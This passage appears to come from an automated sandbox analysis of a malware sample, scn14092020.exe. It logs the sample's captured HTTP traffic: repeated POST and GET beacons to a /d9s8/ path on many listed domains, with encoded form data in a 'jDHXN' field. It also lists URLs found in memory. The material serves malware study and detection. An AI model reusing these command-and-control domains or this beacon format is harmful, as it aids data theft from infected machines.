5f 4c 38 38 41 6b 33 42 51 71 31 68 67 31 41 70 6c 66 73 37 54 41 66 44 4b 79 43 45 55 79 68 32 59 66 4e 31 6a 5a 66 4d 65 6a 7a 6e 77 39 47 70 58 75 36 6f 75 32 6a 31 63 49 6e 7e 6e 35 43 6a 66 35 72 70 4a 71 71 37 31 7e 4b 59 41 70 52 39 4e 76 4d 36 47 42 34 33 34 33 33 5a 54 75 70 39 61 77 72 43 65 34 78 35 51 65 6a 51 36 34 33 71 68 68 5a 7e 32 79 55 6f 6f 6c 4b 4b 74 45 51 29 2e 00 00 00 00 00 00 00 00
    Data Ascii: jDHXN=FbjcCpuQKSzpM2eqFZiZlt34AEYv1xuDIOVGp0KtWT3CWzX4sJHk3RIoQxL1zaSnPB6G9We2UgM1FfMNPYBar1F0fpRi8juYWee-H1yh43uwS15WkmPB(WJBWcBKw2jg3fWcplVNVl~ePy1G8nFhkLZ5kUZGChc4BmIIs0iSSPUWevZq7M0SefMiCWT2D_72ej6OYTx2(Dust4seFBs7ZHqtJVVM2FTm42R1n93IYLGB5OYAFDt6g0(2HzQU4Ms2fdvazbGNJXOY7KYKwwN_L88Ak3BQq1hg1Aplfs7TAfDKyCEUyh2YfN1jZfMejznw9GpXu6ou2j1cIn~n5Cjf5rpJqq71~KYApR9NvM6GB43433ZTup9awrCe4x5QejQ643qhhZ~2yUoolKKtEQ).
Source: global traffic | HTTP traffic detected:
    POST /d9s8/ HTTP/1.1
    Host: www.aktivasi-asuransi-bukalapak.com
    Connection: close
    Content-Length: 411
    Cache-Control: no-cache
    Origin: http://www.aktivasi-asuransi-bukalapak.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.aktivasi-asuransi-bukalapak.com/d9s8/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 6a 44 48 58 4e 3d 39 53 59 6c 46 66 56 34 54 32 31 36 57 77 71 71 64 77 76 69 56 37 56 36 6b 59 4d 78 34 30 73 73 67 78 44 70 48 49 28 32 50 34 65 78 52 6d 44 38 54 39 67 56 4b 67 37 53 70 4c 6d 4c 68 53 78 55 51 2d 4a 79 78 49 56 39 4a 51 38 56 63 7a 38 6a 6c 77 71 79 44 4b 4a 4c 51 6c 74 78 55 30 53 4a 77 69 4d 79 39 34 55 72 6a 45 58 4a 4c 4c 65 30 47 50 56 4f 63 59 54 41 79 39 58 76 30 4b 41 39 5a 5f 7e 4d 4d 74 74 64 79 57 35 65 42 73 51 67 55 2d 55 30 31 75 70 66 4d 77 6d 48 36 56 49 65 4f 64 6b 6e 35 52 71 61 6b 6c 45 55 66 37 42 30 58 65 6b 46 6e 45 45 4a 71 66 44 68 73 53 46 73 58 56 36 78 4c 77 52 75 4d 69 46 69 51 50 48 33 34 4c 35 69 4d 46 28 62 4a 71 59 5a 47 57 51 30 54 30 41 75 31 7a 78 2d 49 32 53 35 68 51 71 77 6a 5a 44 73 70 30 32 32 57 43 30 54 38 35 49 41 75 35 79 49 4d 6d 6e 4d 66 65 41 53 68 32 38 78 4f 43 68 42 6e 59 57 54 70 44 62 50 53 4f 72 50 4d 72 31 5a 75 36 64 68 45 51 57 6a 5a 53 62 36 55 78 51 6d 47 73 79 52 73 5a 42 6a 77 75 78 68 6d 70 6b 71 54 78 77 44 4e 4e 41 41 6e 75 56 55 50 71 47 6d 59 41 5a 4b 30 4e 4a 6f 56 6d 6d 42 55 7a 4e 6a 69 5f 66 74 6a 30 4c 35 73 41 6f 32 63 74 48 55 42 5a 6b 52 76 69 30 70 4a 41 51 7a 4d 5f 76 62 34 32 4d 70 34 66 6c 4f 41 73 4e 73 34 51 29 2e 00 00 00 00 00 00 00 00
    Data Ascii: jDHXN=9SYlFfV4T216WwqqdwviV7V6kYMx40ssgxDpHI(2P4exRmD8T9gVKg7SpLmLhSxUQ-JyxIV9JQ8Vcz8jlwqyDKJLQltxU0SJwiMy94UrjEXJLLe0GPVOcYTAy9Xv0KA9Z_~MMttdyW5eBsQgU-U01upfMwmH6VIeOdkn5RqaklEUf7B0XekFnEEJqfDhsSFsXV6xLwRuMiFiQPH34L5iMF(bJqYZGWQ0T0Au1zx-I2S5hQqwjZDsp022WC0T85IAu5yIMmnMfeASh28xOChBnYWTpDbPSOrPMr1Zu6dhEQWjZSb6UxQmGsyRsZBjwuxhmpkqTxwDNNAAnuVUPqGmYAZK0NJoVmmBUzNji_ftj0L5sAo2ctHUBZkRvi0pJAQzM_vb42Mp4flOAsNs4Q).
Source: global traffic | HTTP traffic detected:
    POST /d9s8/ HTTP/1.1
    Host: www.hqxmf.com
    Connection: close
    Content-Length: 411
    Cache-Control: no-cache
    Origin: http://www.hqxmf.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.hqxmf.com/d9s8/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 6a 44 48 58 4e 3d 6f 69 55 78 4d 6a 4b 44 46 67 6f 4c 38 66 49 6f 79 44 48 49 50 5a 37 43 4c 34 6d 45 4c 43 61 54 44 6a 4f 34 47 79 74 46 6d 32 70 79 56 49 74 59 66 44 72 35 76 4e 35 5a 56 39 42 64 36 5f 49 62 49 48 42 32 75 78 63 6d 59 50 7a 55 49 78 69 73 6d 4c 57 59 73 75 78 65 7a 4e 7e 75 54 6d 54 4e 38 76 72 58 31 73 52 5f 6e 52 6d 6c 73 58 6a 6a 55 4e 69 67 6a 47 37 30 63 6e 63 71 70 58 48 45 49 30 63 50 45 71 50 5a 4b 59 79 74 67 32 45 59 51 66 62 5f 59 39 68 41 30 4a 55 58 69 37 4a 39 79 34 64 63 4d 4f 4f 62 49 58 74 37 41 5a 4c 47 48 6e 4c 65 52 57 68 32 28 66 6d 44 39 2d 6c 62 47 47 61 62 54 5f 33 59 52 65 47 68 73 49 75 50 36 51 7a 48 42 30 4f 53 4b 4e 6b 71 44 65 4d 41 52 79 39 50 41 69 75 2d 4c 72 6f 41 4d 5f 71 4f 61 70 4e 4c 4f 38 4a 74 74 41 28 61 57 5f 35 74 6b 47 31 45 37 51 4b 74 4c 43 34 55 6b 33 56 33 62 53 4c 58 37 48 45 36 46 4b 78 73 65 6f 33 75 67 5f 65 5a 77 32 39 70 63 76 6b 75 6a 34 78 71 4d 72 47 52 46 72 66 4d 75 53 69 6a 38 59 7a 4e 4c 6a 56 59 77 6f 46 6e 4f 7a 37 72 7e 43 4c 59 57 5f 6d 7a 78 4b 61 6e 71 43 4b 66 46 69 36 73 34 6a 79 5a 31 69 64 53 38 2d 5a 68 4f 5a 4d 65 64 64 35 54 28 64 77 34 4c 59 39 59 33 74 65 41 68 75 51 5a 6b 44 69 70 42 4f 4b 71 70 69 68 53 50 77 29 2e 00 00 00 00 00 00 00 00
    Data Ascii: jDHXN=oiUxMjKDFgoL8fIoyDHIPZ7CL4mELCaTDjO4GytFm2pyVItYfDr5vN5ZV9Bd6_IbIHB2uxcmYPzUIxismLWYsuxezN~uTmTN8vrX1sR_nRmlsXjjUNigjG70cncqpXHEI0cPEqPZKYytg2EYQfb_Y9hA0JUXi7J9y4dcMOObIXt7AZLGHnLeRWh2(fmD9-lbGGabT_3YReGhsIuP6QzHB0OSKNkqDeMARy9PAiu-LroAM_qOapNLO8JttA(aW_5tkG1E7QKtLC4Uk3V3bSLX7HE6FKxseo3ug_eZw29pcvkuj4xqMrGRFrfMuSij8YzNLjVYwoFnOz7r~CLYW_mzxKanqCKfFi6s4jyZ1idS8-ZhOZMedd5T(dw4LY9Y3teAhuQZkDipBOKqpihSPw).
Source: global traffic | HTTP traffic detected:
    POST /d9s8/ HTTP/1.1
    Host: www.hivepublications.com
    Connection: close
    Content-Length: 411
    Cache-Control: no-cache
    Origin: http://www.hivepublications.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.hivepublications.com/d9s8/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 6a 44 48 58 4e 3d 4e 47 32 7a 6e 72 74 48 66 50 79 54 71 5f 54 42 31 37 63 67 58 4f 77 4f 4a 32 44 74 48 49 6c 52 55 55 78 43 47 65 71 58 28 69 62 41 4d 46 52 4c 50 4a 7e 71 58 51 6d 67 7a 37 7a 63 31 52 49 47 4a 4d 62 31 4c 57 7a 35 79 45 75 78 39 59 48 63 77 63 30 50 47 6c 39 4a 28 37 55 56 79 64 52 34 43 62 55 49 57 4f 38 77 6c 6e 69 65 34 56 74 6c 73 41 55 64 35 64 55 6f 4f 73 55 4b 36 2d 48 48 30 42 66 52 63 53 6f 32 44 73 6e 44 36 38 4a 33 79 42 31 4b 50 74 4a 37 4b 74 75 4a 55 57 5a 71 4c 71 72 30 56 6e 39 5a 69 41 50 58 57 44 55 50 5a 6d 79 35 45 65 43 72 70 47 72 55 46 4a 4a 39 32 30 58 71 72 39 52 34 4b 73 4d 54 6c 44 50 6f 56 69 47 49 66 7a 58 39 4e 77 73 4e 61 46 65 4e 53 5f 65 6f 53 5f 66 65 62 4d 4d 45 4b 56 43 5f 32 61 46 4f 70 4d 6a 77 68 31 45 2d 4d 35 73 62 4b 6d 77 4f 73 6d 34 66 79 56 6d 74 50 6c 38 41 70 6e 41 4e 35 34 78 58 36 54 69 4f 62 4e 46 5f 6b 74 31 62 7a 47 30 69 79 31 30 6d 59 50 50 77 33 45 61 38 54 79 64 7a 70 55 4c 54 68 42 56 38 63 71 74 59 6a 59 34 74 53 6b 4b 5f 71 74 4d 38 72 37 72 38 39 54 43 59 56 5a 55 4a 64 63 69 7a 52 61 45 55 6c 59 4c 64 59 39 4e 5f 72 6b 34 50 56 50 77 79 4a 75 32 4d 6a 45 52 72 45 70 51 52 48 30 64 67 78 33 47 6c 7e 72 31 49 7e 6f 65 36 44 51 29 2e 00 00 00 00 00 00 00 00
    Data Ascii: jDHXN=NG2znrtHfPyTq_TB17cgXOwOJ2DtHIlRUUxCGeqX(ibAMFRLPJ~qXQmgz7zc1RIGJMb1LWz5yEux9YHcwc0PGl9J(7UVydR4CbUIWO8wlnie4VtlsAUd5dUoOsUK6-HH0BfRcSo2DsnD68J3yB1KPtJ7KtuJUWZqLqr0Vn9ZiAPXWDUPZmy5EeCrpGrUFJJ920Xqr9R4KsMTlDPoViGIfzX9NwsNaFeNS_eoS_febMMEKVC_2aFOpMjwh1E-M5sbKmwOsm4fyVmtPl8ApnAN54xX6TiObNF_kt1bzG0iy10mYPPw3Ea8TydzpULThBV8cqtYjY4tSkK_qtM8r7r89TCYVZUJdcizRaEUlYLdY9N_rk4PVPwyJu2MjERrEpQRH0dgx3Gl~r1I~oe6DQ).
Source: global traffic | HTTP traffic detected:
    POST /d9s8/ HTTP/1.1
    Host: www.chehol.directory
    Connection: close
    Content-Length: 411
    Cache-Control: no-cache
    Origin: http://www.chehol.directory
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.chehol.directory/d9s8/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 6a 44 48 58 4e 3d 67 67 31 6f 6b 32 43 76 35 31 54 67 59 49 6b 5a 57 64 70 67 32 31 65 4f 6c 72 6e 46 4a 78 63 59 6d 4e 63 71 6f 6f 6c 47 72 6c 67 6a 46 72 33 6f 49 42 6c 31 72 6e 7a 41 39 36 72 4c 28 5f 28 37 32 32 50 67 50 5a 68 79 62 4d 39 66 35 4a 39 70 76 79 7e 62 35 73 6d 76 47 4f 46 36 6d 43 69 6f 61 4f 74 2d 39 6f 76 4d 4e 4c 47 4e 35 73 44 31 47 2d 74 58 52 4c 72 32 7a 2d 76 52 62 57 71 66 55 76 56 54 59 68 51 61 57 69 70 62 4b 52 6a 78 6a 6c 66 53 34 76 66 6e 51 30 52 55 38 34 31 64 63 30 52 70 73 59 48 56 45 65 54 4c 6a 33 63 57 62 72 6b 4f 52 4c 30 58 44 4b 71 6e 4c 57 5a 55 55 4e 6c 43 67 66 70 54 39 33 73 48 53 4d 66 43 6d 73 62 6d 51 74 68 64 7e 43 67 7a 39 6e 6f 33 66 34 6e 79 6a 44 38 47 31 4f 50 4b 4e 79 6a 66 6a 5f 68 44 34 4c 4d 50 62 69 4f 64 68 48 34 47 38 46 38 52 55 47 79 54 49 51 71 61 30 6b 62 43 55 66 46 62 43 59 74 64 50 33 33 49 55 56 30 55 42 76 64 4b 78 79 4d 75 79 4b 76 6c 47 7a 63 67 70 4f 4b 34 51 67 74 74 5a 48 6e 45 77 6a 35 31 51 41 64 36 63 67 63 43 43 79 68 38 30 35 31 31 66 47 6d 68 41 36 44 33 63 76 34 70 32 4b 62 6d 45 45 43 64 69 55 59 2d 67 5a 50 59 52 6b 74 6d 7a 4b 74 5a 54 70 43 55 37 41 36 37 37 5f 47 34 72 6c 6b 67 79 42 56 35 4c 69 36 31 72 43 54 58 35 67 29 2e 00 00 00 00 00 00 00 00
    Data Ascii: jDHXN=gg1ok2Cv51TgYIkZWdpg21eOlrnFJxcYmNcqoolGrlgjFr3oIBl1rnzA96rL(_(722PgPZhybM9f5J9pvy~b5smvGOF6mCioaOt-9ovMNLGN5sD1G-tXRLr2z-vRbWqfUvVTYhQaWipbKRjxjlfS4vfnQ0RU841dc0RpsYHVEeTLj3cWbrkORL0XDKqnLWZUUNlCgfpT93sHSMfCmsbmQthd~Cgz9no3f4nyjD8G1OPKNyjfj_hD4LMPbiOdhH4G8F8RUGyTIQqa0kbCUfFbCYtdP33IUV0UBvdKxyMuyKvlGzcgpOK4QgttZHnEwj51QAd6cgcCCyh80511fGmhA6D3cv4p2KbmEECdiUY-gZPYRktmzKtZTpCU7A677_G4rlkgyBV5Li61rCTX5g).
          Source: global traffic | HTTP traffic detected:
              POST /d9s8/ HTTP/1.1
              Host: www.martjeje2.info
              Connection: close
              Content-Length: 411
              Cache-Control: no-cache
              Origin: http://www.martjeje2.info
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Content-Type: application/x-www-form-urlencoded
              Accept: */*
              Referer: http://www.martjeje2.info/d9s8/
              Accept-Language: en-US
              Accept-Encoding: gzip, deflate
              Data Raw: 6a 44 48 58 4e 3d 34 48 4d 37 4e 2d 6f 43 42 38 37 65 6e 6b 59 78 64 43 75 7a 7e 4e 35 4d 71 5a 56 48 74 38 35 37 66 4a 47 36 6b 34 4a 74 66 35 6d 32 51 2d 77 63 72 6b 49 4e 74 6d 71 34 52 36 70 49 77 72 4d 55 6b 66 4f 5a 39 69 71 65 39 62 6a 79 33 49 54 79 30 64 62 76 6f 52 46 6a 7a 64 55 38 58 36 58 48 4f 6b 42 65 43 61 6a 4c 35 46 75 55 6d 66 37 62 6d 79 61 76 68 55 39 31 56 31 43 45 76 74 51 33 6a 4f 56 71 73 53 4e 35 56 78 4f 5f 47 68 35 65 45 34 34 50 39 77 42 47 49 76 53 71 35 44 43 68 78 57 45 75 50 62 54 36 4b 75 5a 52 49 44 4e 39 38 4a 41 6c 75 6b 50 32 51 6f 67 75 62 42 77 4e 52 39 4b 6b 46 4d 79 31 59 46 46 41 32 54 59 67 4d 35 75 4c 38 6e 4d 67 53 4d 28 74 41 63 41 68 6c 69 56 69 31 4b 30 36 73 33 48 76 76 7a 67 56 41 64 36 44 76 49 52 45 39 76 71 78 74 57 79 75 6a 5a 4f 4f 47 54 4f 6e 28 34 6a 77 28 72 5a 45 53 67 43 56 79 52 4e 4e 46 72 4d 53 49 6b 35 71 4b 47 77 63 75 4d 70 76 55 34 7a 46 39 69 59 45 68 35 68 62 43 72 59 30 44 67 64 58 37 61 4e 51 63 30 76 4a 4b 61 52 48 4a 34 57 69 79 78 6b 6a 34 71 44 50 4b 68 7a 5a 6b 43 61 76 74 64 4b 70 77 39 45 76 37 44 7e 48 52 72 42 62 66 66 54 57 45 65 34 74 39 4f 51 63 79 54 63 42 41 70 58 79 31 72 77 34 66 76 63 7a 63 32 47 49 73 5a 6b 79 65 67 29 2e 00 00 00 00 00 00 00 00
              Data Ascii: jDHXN=4HM7N-oCB87enkYxdCuz~N5MqZVHt857fJG6k4Jtf5m2Q-wcrkINtmq4R6pIwrMUkfOZ9iqe9bjy3ITy0dbvoRFjzdU8X6XHOkBeCajL5FuUmf7bmyavhU91V1CEvtQ3jOVqsSN5VxO_Gh5eE44P9wBGIvSq5DChxWEuPbT6KuZRIDN98JAlukP2QogubBwNR9KkFMy1YFFA2TYgM5uL8nMgSM(tAcAhliVi1K06s3HvvzgVAd6DvIRE9vqxtWyujZOOGTOn(4jw(rZESgCVyRNNFrMSIk5qKGwcuMpvU4zF9iYEh5hbCrY0DgdX7aNQc0vJKaRHJ4Wiyxkj4qDPKhzZkCavtdKpw9Ev7D~HRrBbffTWEe4t9OQcyTcBApXy1rw4fvczc2GIsZkyeg).
          Source: global traffic | HTTP traffic detected:
              GET /d9s8/?Bh=chLTAJW8o&jDHXN=0JLOdGg1pxN6Gt1Bi/JSJ+sGVc5LpPYI1jRUQtJxPcLLDPheB182/GB7jVB+9emH0R5P HTTP/1.1
              Host: www.brasserie-lafayette.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected:
              GET /d9s8/?jDHXN=d6pEJxSdPSBH0MIO1uNgncpVh40baHTR/jhPmc3N2xeTp5EUHVGtu5D3SsniCJrPBB9M&Bh=chLTAJW8o HTTP/1.1
              Host: www.clicrhonealpes.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected:
              GET /d9s8/?Bh=chLTAJW8o&jDHXN=WJb/CysgWCw91yJWs6LNuDX/buU9ws/TxtuWb/JnOd32EuNV24o2CESIFihwpFgP5dzA HTTP/1.1
              Host: www.animalsnecessity.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected:
              GET /d9s8/?jDHXN=3OckiECOiD+psyI+NQjFIxWDb4gozbrDIe4cjEZ2xT/QUh3byTqlra9o3wyRY1odpqBV&Bh=chLTAJW8o HTTP/1.1
              Host: www.uuid.blue
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected:
              GET /d9s8/?Bh=chLTAJW8o&jDHXN=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9bPA0ZyiUQJd HTTP/1.1
              Host: www.keebcat.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected:
              GET /d9s8/?jDHXN=KZXmcMedBwfhNG72Yprv36X6G3gBjgWEN6ED81KrdGuEeSGip76GxhQuMQ345P+ATXiO&Bh=chLTAJW8o HTTP/1.1
              Host: www.revolucaomindfulness.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected:
              GET /d9s8/?Bh=chLTAJW8o&jDHXN=yQsfb6F+aE13Jx6qI3j1CMlHibkP501s7Hi6bb3WKNeqcCrzTo1bPmy/qNSTnwpHMJRP HTTP/1.1
              Host: www.aktivasi-asuransi-bukalapak.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected:
              GET /d9s8/?jDHXN=nggLSHHwBxgJuORrvzKJVs32BLSeJBWsdDbHUzpPnmBTU59XQSi8nYsaBuFg5MktW3Bd&Bh=chLTAJW8o HTTP/1.1
              Host: www.hqxmf.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected:
              GET /d9s8/?jDHXN=CECJ5NlVRfC6rcavsOdFHLgWBVmwF6tqPRsoe/u97wTXDE14KZP6Fmisn7GjwDc8cLbW&Bh=chLTAJW8o HTTP/1.1
              Host: www.hivepublications.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected:
              GET /d9s8/?Bh=chLTAJW8o&jDHXN=viBS6Wze00HUNqFEE58ery/tqe73OVEI1otdtPhhnn8HDYG2Px46lSa5vqP2//3Rjw/o HTTP/1.1
              Host: www.chehol.directory
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected:
              GET /d9s8/?jDHXN=3F4BTbkTDsrb23tZAXb3hdJ3+Zxxneo5KOr91LRTQbT8RfY+vB5Yp2XFHspK9JZO7aDS&Bh=chLTAJW8o HTTP/1.1
              Host: www.martjeje2.info
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: unknown | DNS traffic detected: queries for: www.brasserie-lafayette.com
          Source: unknown | HTTP traffic detected:
              POST /d9s8/ HTTP/1.1
              Host: www.clicrhonealpes.com
              Connection: close
              Content-Length: 411
              Cache-Control: no-cache
              Origin: http://www.clicrhonealpes.com
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Content-Type: application/x-www-form-urlencoded
              Accept: */*
              Referer: http://www.clicrhonealpes.com/d9s8/
              Accept-Language: en-US
              Accept-Encoding: gzip, deflate
              Data Raw: 6a 44 48 58 4e 3d 53 34 64 2d 58 57 65 72 4a 79 4e 59 71 63 39 53 72 34 59 45 39 4d 52 6e 74 39 41 55 50 6b 62 4c 72 45 41 75 7e 76 4c 57 34 67 61 6a 35 59 49 55 47 47 58 6d 6b 74 4f 6c 52 76 72 4d 48 72 7a 35 42 78 39 47 41 79 58 5f 39 61 44 31 54 35 4b 75 30 7a 65 66 7a 46 6b 4f 67 68 6d 78 69 4c 39 2d 58 67 68 33 53 6d 30 62 74 55 67 79 45 65 31 65 6e 43 45 71 4a 37 75 75 6b 70 44 72 68 45 50 74 65 68 77 6c 75 39 37 4d 6b 57 59 34 64 31 4e 6e 45 4b 55 5f 59 6c 55 63 49 65 35 46 70 6a 56 45 73 30 56 4c 6b 36 6d 56 61 41 74 5a 69 76 44 5f 67 77 64 6b 4a 5a 6e 68 61 58 4e 4b 41 4b 4c 78 68 4f 4e 59 54 57 6e 67 54 52 79 49 32 51 72 76 4a 41 6c 5a 73 63 79 75 44 51 4d 5a 4c 4e 53 61 32 4e 41 43 36 6f 6f 63 51 2d 39 54 54 7a 39 6c 69 6a 33 32 65 46 55 4c 62 6c 69 53 43 31 58 56 37 6d 34 55 6c 5a 30 2d 36 76 6d 65 62 74 7a 48 47 5f 55 44 73 55 63 59 4d 68 4b 46 53 52 4f 52 70 43 73 6b 6e 66 67 6f 54 6c 30 64 55 57 4d 61 62 65 7e 43 36 5f 67 7a 74 30 28 34 62 68 72 65 66 31 67 36 79 4e 61 6b 54 4d 4f 36 4c 37 37 37 52 58 51 34 6d 43 46 75 77 70 41 4e 7a 53 6d 64 6b 49 56 75 48 43 28 79 57 31 31 41 45 56 30 70 79 33 53 51 67 46 77 44 4e 43 6f 68 71 58 66 6f 61 55 56 4e 71 36 78 52 6e 50 69 63 61 37 6a 6b 6a 77 29 2e 00 00 00 00 00 00 00 00
              Data Ascii: jDHXN=S4d-XWerJyNYqc9Sr4YE9MRnt9AUPkbLrEAu~vLW4gaj5YIUGGXmktOlRvrMHrz5Bx9GAyX_9aD1T5Ku0zefzFkOghmxiL9-Xgh3Sm0btUgyEe1enCEqJ7uukpDrhEPtehwlu97MkWY4d1NnEKU_YlUcIe5FpjVEs0VLk6mVaAtZivD_gwdkJZnhaXNKAKLxhONYTWngTRyI2QrvJAlZscyuDQMZLNSa2NAC6oocQ-9TTz9lij32eFULbliSC1XV7m4UlZ0-6vmebtzHG_UDsUcYMhKFSRORpCsknfgoTl0dUWMabe~C6_gzt0(4bhref1g6yNakTMO6L777RXQ4mCFuwpANzSmdkIVuHC(yW11AEV0py3SQgFwDNCohqXfoaUVNq6xRnPica7jkjw).
          Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Server: nginx
              Date: Mon, 14 Sep 2020 21:16:42 GMT
              Content-Type: text/html; charset=UTF-8
              Content-Length: 146
              Connection: close
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: scn14092020.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: scn14092020.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: scn14092020.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: scn14092020.exe | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: scn14092020.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: scn14092020.exe | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: explorer.exe, 00000002.00000000.194508710.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/logo.png)
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/search-icon.png)
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/arrow.png)
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libgh.png)
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
          Source: ipconfig.exe, 00000004.00000002.438848508.000000000352D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
